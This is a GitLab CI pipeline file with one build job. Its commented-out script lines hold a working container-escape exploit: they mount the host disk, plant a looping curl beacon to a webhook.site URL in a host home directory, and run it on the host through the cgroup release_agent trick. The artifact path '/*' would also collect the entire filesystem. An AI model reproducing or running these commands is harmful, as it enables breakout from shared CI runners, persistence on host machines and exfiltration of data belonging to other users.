build-job:
  stage: build
  
  tags:
    - gitlab-org-docker
  script:
    - echo $hi > text.txt
      # - mkdir -p /mnt/hola
      # - mount /dev/sda1 /mnt/hola
      # - echo 'while true; do curl https://webhook.site/70cf64a5-3e0f-41fe-9f2c-53b3e0abf5f3 && sleep 60; done' > /mnt/hola/home/scara
      # - ls -l /mnt/hola/home
      # - d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
      # - mkdir -p $d/w;echo 1 >$d/w/notify_on_release
      # - t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
      # - [touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh\nbash /home/scara >'"$t/o" >/c]
      # - chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o;
      # - sleep 100000000
  artifacts:
    paths:
      - /*
